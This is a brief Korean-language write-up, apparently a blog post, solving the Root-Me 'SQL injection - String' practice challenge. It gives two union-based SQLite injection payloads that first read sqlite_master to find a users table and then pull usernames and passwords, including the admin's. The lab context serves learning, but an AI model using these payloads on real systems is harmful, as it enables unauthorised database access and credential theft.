rootme - SQL injection - String

문제 페이지는 접속하면 검색하는 부분에서 sqli가 터집니다. 해당 부분에서 union sqli 를 해줍니다. >> 1' union select 0,sql from sqlite_master-- users 라는 테이블명을 알아낼 수 있고 >> 1' union select username, password from users -- admin의 password를 알 수 있습니다.

2021.03.12